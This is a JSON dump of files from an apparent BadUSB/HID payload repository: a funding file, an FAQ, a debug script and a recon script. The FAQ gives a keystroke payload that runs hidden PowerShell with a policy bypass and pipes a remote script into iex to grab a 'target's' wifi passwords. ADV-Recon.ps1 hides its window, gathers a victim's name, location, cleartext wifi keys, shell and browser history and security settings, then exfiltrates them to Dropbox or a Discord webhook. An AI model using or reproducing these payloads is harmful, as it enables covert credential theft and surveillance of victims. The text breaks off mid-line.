[ { "path": ".github/FUNDING.yml", "content": "# These are supported funding model platforms\n\ngithub: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]\npatreon: # Replace with a single Patreon username\nopen_collective: # Replace with a single Open Collective username\nko_fi: # Replace with a single Ko-fi username\ntidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel\ncommunity_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry\nliberapay: # Replace with a single Liberapay username\nissuehunt: # Replace with a single IssueHunt username\notechie: # Replace with a single Otechie username\nlfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry\ncustom: [https://iamjakoby.com/donate]\n" }, { "path": "FAQs.md", "content": "# FAQ\n\n## 1. The code is executed but the Powershell code just opens and closes and nothing happens\n\nIn order for Jakoby or one of his Admin's to properly help you we need to assess and find an error to work with. \n\nThe first step is to replace `-w h` with `-noexit` in your code. This will keep the Powershell window open and display any errors you may have \n\nTake a screen shot of the error and include it with your help request\n\n\n\n----------------------------------------------------------------------------------------------------------------------------------------\n\n## 2. How do I use a plug and play payload? \n\nThese payloads are designed to make them as easy as possible to use. \n* There is no longer a need to download a copy, modify it, and host somewhere yourself \n* Simply plug in your Dropbox token or Discord webhook into the appropriate variable \n\nUsing the Wifi Grabber payload as an example:\n`$dc=''` is for Discord | `$db=''` is for Dropbox\n\n```\nREM Title: Wifi Grabber\nREM Author: I am Jakoby\nREM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $dc='YOUR-DISCORD-WEBHOOK';$db='YOUR-DROPBOX-TOKEN';iwr jakoby.lol/e8v | iex\nENTER\n```\n\n----------------------------------------------------------------------------------------------------------------------------------------\n\n## 3. What is a Dropbox token and how do I use it? \nYou can use this video to learn all about it\n\n

\n \n \"C#\"\n \n

\n\n----------------------------------------------------------------------------------------------------------------------------------------\n\n## 4. What is a Discord Webhook and how do I use it? \nYou can use this video to learn all about it\n

\n \n \"C#\"\n \n

\n" }, { "path": "Payloads/Debug/Debug.ps1", "content": "\nfunction Upload-Discord {\n\n\t[CmdletBinding()]\n\tparam (\n\t\t[parameter(Position=0,Mandatory=$False)]\n\t\t[string]$file,\n\t\t[parameter(Position=1,Mandatory=$False)]\n\t\t[string]$text \n\t)\n\n\t$hookurl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTA5MjA0MjI2NzIzOTM5NTM5OC9EN2JDMkFuRFVfajYybU1EOEVGUENsSmtrMTdPV0w4ZnNqMW5JdkRHckJOWjJfTUZuQlZkQ2ZLRjRkS1Zac2tTU0dMUg==\"))\n\n\t$Body = @{\n\t 'username' = $env:username\n\t 'content' = $text\n\t}\n\n\tif (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};\n\n\tif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nfunction Resolve-ErrorRecord\n{\n param(\n [Parameter(Position=0, ValueFromPipeline=$true)]\n [ValidateNotNull()]\n [System.Management.Automation.ErrorRecord[]]\n $ErrorRecord\n )\n\n Process\n {\n if (!$ErrorRecord)\n {\n if ($global:Error.Count -eq 0)\n {\n Write-Host \"The `$Error collection is empty.\"\n return\n }\n else\n {\n $ErrorRecord = @($global:Error[0])\n }\n }\n foreach ($record in $ErrorRecord)\n {\n $txt = @($record | Format-List * -Force | Out-String -Stream)\n $txt += @($record.InvocationInfo | Format-List * | Out-String -Stream)\n $Exception = $record.Exception\n for ($i = 0; $Exception; $i++, ($Exception = $Exception.InnerException))\n {\n $txt += \"Exception at nesting level $i ---------------------------------------------------\"\n $txt += @($Exception | Format-List * -Force | Out-String -Stream)\n }\n\n $txt | Foreach {$prevBlank=$false} {\n if ($_.Trim().Length -gt 0)\n {\n $_\n $prevBlank = $false\n }\n elseif (!$prevBlank)\n {\n $_\n $prevBlank = $true\n }\n }\n }\n }\n}\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nfunction Get-ScreenCss\n{\n param()\n\n Process\n {\n ''\n }\n}\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nfunction Get-ScreenHtml\n{\n param($Count = $Host.UI.RawUI.WindowSize.Height)\n\n Begin\n {\n # Required by HttpUtility\n Add-Type -Assembly System.Web\n\n $raw = $Host.UI.RawUI\n $buffsz = $raw.BufferSize\n\n function BuildHtml($out, $buff)\n {\n function OpenElement($out, $fore, $back)\n {\n & {\n $out.Append('')\n } | out-null\n }\n\n function CloseElement($out) {\n $out.Append('') | out-null\n }\n\n $height = $buff.GetUpperBound(0)\n $width = $buff.GetUpperBound(1)\n\n $prev = $null\n $whitespaceCount = 0\n\n $out.Append(\"
\") | out-null\n\n            for ($y = 0; $y -lt $height; $y++)\n            {\n                for ($x = 0; $x -lt $width; $x++)\n                {\n                    $current = $buff[$y, $x]\n\n                    if ($current.Character -eq ' ')\n                    {\n                        $whitespaceCount++\n                        write-debug \"whitespaceCount: $whitespaceCount\"\n                    }\n                    else\n                    {\n                        if ($whitespaceCount)\n                        {\n                            write-debug \"appended $whitespaceCount spaces, whitespaceCount: 0\"\n                            $out.Append((new-object string ' ', $whitespaceCount)) | out-null\n                            $whitespaceCount = 0\n                        }\n\n                        if ((-not $prev) -or\n                            ($prev.ForegroundColor -ne $current.ForegroundColor) -or\n                            ($prev.BackgroundColor -ne $current.BackgroundColor))\n                        {\n                            if ($prev) { CloseElement $out }\n\n                            OpenElement $out $current.ForegroundColor $current.BackgroundColor\n                        }\n\n                        $char = [System.Web.HttpUtility]::HtmlEncode($current.Character)\n                        $out.Append($char) | out-null\n                        $prev =    $current\n                    }\n                }\n\n                $out.Append(\"`n\") | out-null\n                $whitespaceCount = 0\n            }\n\n            if($prev) { CloseElement $out }\n\n            $out.Append('
') | out-null\n }\n }\n\n Process\n {\n $cursor = $raw.CursorPosition\n\n $rect = new-object Management.Automation.Host.Rectangle 0, ($cursor.Y - $Count), $buffsz.Width, $cursor.Y\n $buff = $raw.GetBufferContents($rect)\n\n $out = new-object Text.StringBuilder\n BuildHtml $out $buff\n $out.ToString()\n }\n}\n\n# ----------------------------------------------------------------------------------------------------------------------\nfunction main {\n$css = Get-ScreenCss\n$html = Get-ScreenHtml\n\necho $css > $env:tmp\\jakobyHelpTicket.html\necho $html >> $env:tmp\\jakobyhelpticket.html\n\n$errorRecord = Resolve-ErrorRecord\necho $errorRecord > $env:tmp\\ErrorRecord.txt\n\nUpload-Discord -file $env:tmp\\jakobyHelpTicket.html\n\nUpload-Discord -file $env:tmp\\ErrorRecord.txt\n\n}\n\nmain\n# ----------------------------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------------------------------------------------------------------\n" }, { "path": "Payloads/Flip-ADV-Recon/ADV-Recon.ps1", "content": "############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \r\n# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\r\n# Category : Recon | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\r\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n \r\n<#\r\n.SYNOPSIS\r\n\tThis is an advanced recon of a target PC and exfiltration of that data.\r\n.DESCRIPTION \r\n\tThis program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.\r\n\tAll of the gather information is formatted neatly and output to a file.\r\n\tThat file is then exfiltrated to cloud storage via Dropbox.\r\n.Link\r\n https://developers.dropbox.com/oauth-guide\t # Guide for setting up your Dropbox for uploads\r\n https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads \r\n https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads\r\n#>\r\n\r\n############################################################################################################################################################\r\n\r\n$i = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\r\nadd-type -name win -member $i -namespace native;\r\n[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\r\n\r\n\r\n# MAKE LOOT FOLDER, FILE, and ZIP \r\n\r\n$FolderName = \"$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)\"\r\n\r\n$FileName = \"$FolderName.txt\"\r\n\r\n$ZIP = \"$FolderName.zip\"\r\n\r\nNew-Item -Path $env:tmp/$FolderName -ItemType Directory\r\n\r\n############################################################################################################################################################\r\n\r\n# Enter your access tokens below. At least one has to be provided but both can be used at the same time. \r\n\r\n#$db = \"\"\r\n\r\n#$dc = \"\"\r\n\r\n############################################################################################################################################################\r\n\r\n# Recon all User Directories\r\ntree $Env:userprofile /a /f >> $env:TEMP\\$FolderName\\tree.txt\r\n\r\n# Powershell history\r\nCopy-Item \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -Destination $env:TEMP\\$FolderName\\Powershell-History.txt\r\n\r\n############################################################################################################################################################\r\n\r\nfunction Get-fullName {\r\n\r\n try {\r\n $fullName = (Get-LocalUser -Name $env:USERNAME).FullName\r\n }\r\n \r\n # If no name is detected function will return $env:UserName \r\n\r\n # Write Error is just for troubleshooting \r\n catch {Write-Error \"No name was detected\" \r\n return $env:UserName\r\n -ErrorAction SilentlyContinue\r\n }\r\n\r\n return $fullName \r\n\r\n}\r\n\r\n$fullName = Get-fullName\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nfunction Get-email {\r\n \r\n try {\r\n\r\n $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName\r\n return $email\r\n }\r\n\r\n# If no email is detected function will return backup message for sapi speak\r\n\r\n # Write Error is just for troubleshooting\r\n catch {Write-Error \"An email was not found\" \r\n return \"No Email Detected\"\r\n -ErrorAction SilentlyContinue\r\n } \r\n}\r\n\r\n$email = Get-email\r\n\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nfunction Get-GeoLocation{\r\n\ttry {\r\n\tAdd-Type -AssemblyName System.Device #Required to access System.Device.Location namespace\r\n\t$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object\r\n\t$GeoWatcher.Start() #Begin resolving current locaton\r\n\r\n\twhile (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {\r\n\t\tStart-Sleep -Milliseconds 100 #Wait for discovery.\r\n\t} \r\n\r\n\tif ($GeoWatcher.Permission -eq 'Denied'){\r\n\t\tWrite-Error 'Access Denied for Location Information'\r\n\t} else {\r\n\t\t$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.\r\n\t}\r\n\t}\r\n # Write Error is just for troubleshooting\r\n catch {Write-Error \"No coordinates found\" \r\n return \"No Coordinates found\"\r\n -ErrorAction SilentlyContinue\r\n } \r\n\r\n}\r\n\r\n$GeoLocation = Get-GeoLocation\r\n\r\n$GeoLocation = $GeoLocation -split \" \"\r\n\r\n$Lat = $GeoLocation[0].Substring(11) -replace \".$\"\r\n\r\n$Lon = $GeoLocation[1].Substring(10) -replace \".$\"\r\n\r\n############################################################################################################################################################\r\n\r\n# local-user\r\n\r\n$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String \r\n\r\n############################################################################################################################################################\r\n\r\nFunction Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }\r\n\r\n$Key = \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" \r\n$ConsentPromptBehaviorAdmin_Name = \"ConsentPromptBehaviorAdmin\" \r\n$PromptOnSecureDesktop_Name = \"PromptOnSecureDesktop\" \r\n\r\n$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name \r\n$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name\r\n\r\nIf($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = \"Never notIfy\" }\r\n \r\nElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = \"NotIfy me only when apps try to make changes to my computer(do not dim my desktop)\" } \r\n\r\nElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = \"NotIfy me only when apps try to make changes to my computer(default)\" }\r\n \r\nElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = \"Always notIfy\" }\r\n \r\nElse{ $UAC = \"Unknown\" } \r\n\r\n############################################################################################################################################################\r\n\r\n$lsass = Get-Process -Name \"lsass\"\r\n\r\nif ($lsass.ProtectedProcess) {$lsass = \"LSASS is running as a protected process.\"} \r\n\r\nelse {$lsass = \"LSASS is not running as a protected process.\"}\r\n\r\n############################################################################################################################################################\r\n\r\n$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath(\"Startup\"))).Name\r\n\r\n############################################################################################################################################################\r\n\r\n# Get nearby wifi networks\r\n\r\ntry\r\n{\r\n$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like \"SSID*\" -or $_ -like \"*Authentication*\" -or $_ -like \"*Encryption*\"}).trim()\r\n}\r\ncatch\r\n{\r\n$NearbyWifi=\"No nearby wifi networks detected\"\r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n# Get info about pc\r\n\r\n# Get IP / Network Info\r\n\r\ntry{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}\r\ncatch{$computerPubIP=\"Error getting Public IP\"}\r\n\r\ntry{$localIP = Get-NetIPAddress -InterfaceAlias \"*Ethernet*\",\"*Wi-Fi*\" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}\r\ncatch{$localIP = \"Error getting local IP\"}\r\n\r\n$MAC = Get-NetAdapter -Name \"*Ethernet*\",\"*Wi-Fi*\"| Select Name, MacAddress, Status | Out-String\r\n\r\n# Check RDP\r\n\r\nif ((Get-ItemProperty \"hklm:\\System\\CurrentControlSet\\Control\\Terminal Server\").fDenyTSConnections -eq 0) { \r\n\t$RDP = \"RDP is Enabled\" \r\n} else {\r\n\t$RDP = \"RDP is NOT enabled\" \r\n}\r\n\r\n############################################################################################################################################################\r\n\r\n#Get System Info\r\n$computerSystem = Get-CimInstance CIM_ComputerSystem\r\n\r\n$computerName = $computerSystem.Name\r\n\r\n$computerModel = $computerSystem.Model\r\n\r\n$computerManufacturer = $computerSystem.Manufacturer\r\n\r\n$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String\r\n\r\n$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String\r\n\r\n$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String\r\n\r\n$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String\r\n\r\n$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f ($_.sum / 1GB)} | Out-String\r\n\r\n$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String\r\n\r\n############################################################################################################################################################\r\n\r\n$ScheduledTasks = Get-ScheduledTask\r\n\r\n############################################################################################################################################################\r\n\r\n$klist = klist sessions\r\n\r\n############################################################################################################################################################\r\n\r\n$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime\r\n\r\n############################################################################################################################################################\r\n\r\n# Get HDDs\r\n$driveType = @{\r\n 2=\"Removable disk \"\r\n 3=\"Fixed local disk \"\r\n 4=\"Network disk \"\r\n 5=\"Compact disk \"}\r\n$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f ($_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f ($_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name=\"Size GB\"; Expression={$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={$_.FreeSpace_percent}; align=\"right\"; } | Out-String\r\n\r\n#Get - Com & Serial Devices\r\n$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250\r\n\r\n############################################################################################################################################################\r\n\r\n# Get Network Interfaces\r\n$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250\r\n\r\n$wifiProfiles = (netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String\r\n\r\n############################################################################################################################################################\r\n\r\n# process first\r\n$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250\r\n\r\n# Get Listeners / ActiveTcpConnections\r\n$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={$_.LocalAddress + \":\" + $_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={$_.RemoteAddress + \":\" + $_.RemotePort}}, State, AppliedSetting, OwningProcess\r\n$listener = $listener | foreach-object {\r\n $listenerItem = $_\r\n $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })\r\n new-object PSObject -property @{\r\n \"LocalAddress\" = $listenerItem.LocalAddress\r\n \"RemoteAddress\" = $listenerItem.RemoteAddress\r\n \"State\" = $listenerItem.State\r\n \"AppliedSetting\" = $listenerItem.AppliedSetting\r\n \"OwningProcess\" = $listenerItem.OwningProcess\r\n \"ProcessName\" = $processItem.ProcessName\r\n }\r\n} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250 \r\n\r\n# service\r\n$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250\r\n\r\n# installed software (get uninstaller)\r\n$software=Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250\r\n\r\n# drivers\r\n$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250\r\n\r\n# videocard\r\n$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250\r\n\r\n\r\n############################################################################################################################################################\r\n\r\n# OUTPUTS RESULTS TO LOOT FILE\r\n\r\n$output = @\"\r\n\r\n############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _' | | '_ ' _ \\ _ | | / _' | | |/ / / _ \\ | '_ \\ | | | |# 'Y8888888Y' # \r\n# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' #\r\n# Category : Recon | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# 'Y' #\r\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| ('\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n\r\n\r\nFull Name: $fullName\r\n\r\nEmail: $email\r\n\r\nGeoLocation:\r\nLatitude: $Lat \r\nLongitude: $Lon\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nLocal Users:\r\n$luser\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nUAC State:\r\n$UAC\r\n\r\nLSASS State:\r\n$lsass\r\n\r\nRDP State:\r\n$RDP\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nPublic IP: \r\n$computerPubIP\r\n\r\nLocal IPs:\r\n$localIP\r\n\r\nMAC:\r\n$MAC\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nComputer Name:\r\n$computerName\r\n\r\nModel:\r\n$computerModel\r\n\r\nManufacturer:\r\n$computerManufacturer\r\n\r\nBIOS:\r\n$computerBIOS\r\n\r\nOS:\r\n$computerOs\r\n\r\nCPU:\r\n$computerCpu\r\n\r\nMainboard:\r\n$computerMainboard\r\n\r\nRam Capacity:\r\n$computerRamCapacity\r\n\r\nTotal installed Ram:\r\n$computerRam\r\n\r\nVideo Card: \r\n$videocard\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nContents of Start Up Folder:\r\n$StartUp\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nScheduled Tasks:\r\n$ScheduledTasks\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nLogon Sessions:\r\n$klist\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nRecent Files:\r\n$RecentFiles\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nHard-Drives:\r\n$Hdds\r\n\r\nCOM Devices:\r\n$COMDevices\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nNetwork Adapters:\r\n$NetworkAdapters\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nNearby Wifi:\r\n$NearbyWifi\r\n\r\nWifi Profiles: \r\n$wifiProfiles\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nProcess:\r\n$process\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nListeners:\r\n$listener\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nServices:\r\n$service\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nInstalled Software: \r\n$software\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\nDrivers: \r\n$drivers\r\n\r\n------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\"@\r\n\r\n$output > $env:TEMP\\$FolderName/computerData.txt\r\n\r\n############################################################################################################################################################\r\n\r\nfunction Get-BrowserData {\r\n\r\n [CmdletBinding()]\r\n param (\t\r\n [Parameter (Position=1,Mandatory = $True)]\r\n [string]$Browser, \r\n [Parameter (Position=1,Mandatory = $True)]\r\n [string]$DataType \r\n ) \r\n\r\n $Regex = '(http|https)://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\r\n\r\n if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\"}\r\n elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks\"}\r\n elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Microsoft/Edge/User Data/Default/History\"}\r\n elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\"}\r\n elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default-release\\places.sqlite\"}\r\n \r\n\r\n $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique\r\n $Value | ForEach-Object {\r\n $Key = $_\r\n if ($Key -match $Search){\r\n New-Object -TypeName PSObject -Property @{\r\n User = $env:UserName\r\n Browser = $Browser\r\n DataType = $DataType\r\n Data = $_\r\n }\r\n }\r\n } \r\n}\r\n\r\nGet-BrowserData -Browser \"edge\" -DataType \"history\" >> $env:TMP\\$FolderName\\BrowserData.txt\r\n\r\nGet-BrowserData -Browser \"edge\" -DataType \"bookmarks\" >> $env:TMP\\$FolderName\\BrowserData.txt\r\n\r\nGet-BrowserData -Browser \"chrome\" -DataType \"history\" >> $env:TMP\\$FolderName\\BrowserData.txt\r\n\r\nGet-BrowserData -Browser \"chrome\" -DataType \"bookmarks\" >> $env:TMP\\$FolderName\\BrowserData.txt\r\n\r\nGet-BrowserData -Browser \"firefox\" -DataType \"history\" >> $env:TMP\\$FolderName\\BrowserData.txt\r\n\r\n############################################################################################################################################################\r\n\r\nCompress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP\r\n\r\n# Upload output file to dropbox\r\n\r\nfunction dropbox {\r\n$TargetFilePath=\"/$ZIP\"\r\n$SourceFilePath=\"$env:TEMP\\$ZIP\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $db\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n}\r\n\r\nif (-not ([string]::IsNullOrEmpty($db))){dropbox}\r\n\r\n############################################################################################################################################################\r\n\r\nfunction Upload-Discord {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n [parameter(Position=0,Mandatory=$False)]\r\n [string]$file,\r\n [parameter(Position=1,Mandatory=$False)]\r\n [string]$text \r\n)\r\n\r\n$hookurl = \"$dc\"\r\n\r\n$Body = @{\r\n 'username' = $env:username\r\n 'content' = $text\r\n}\r\n\r\nif (-not ([string]::IsNullOrEmpty($text))){\r\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | 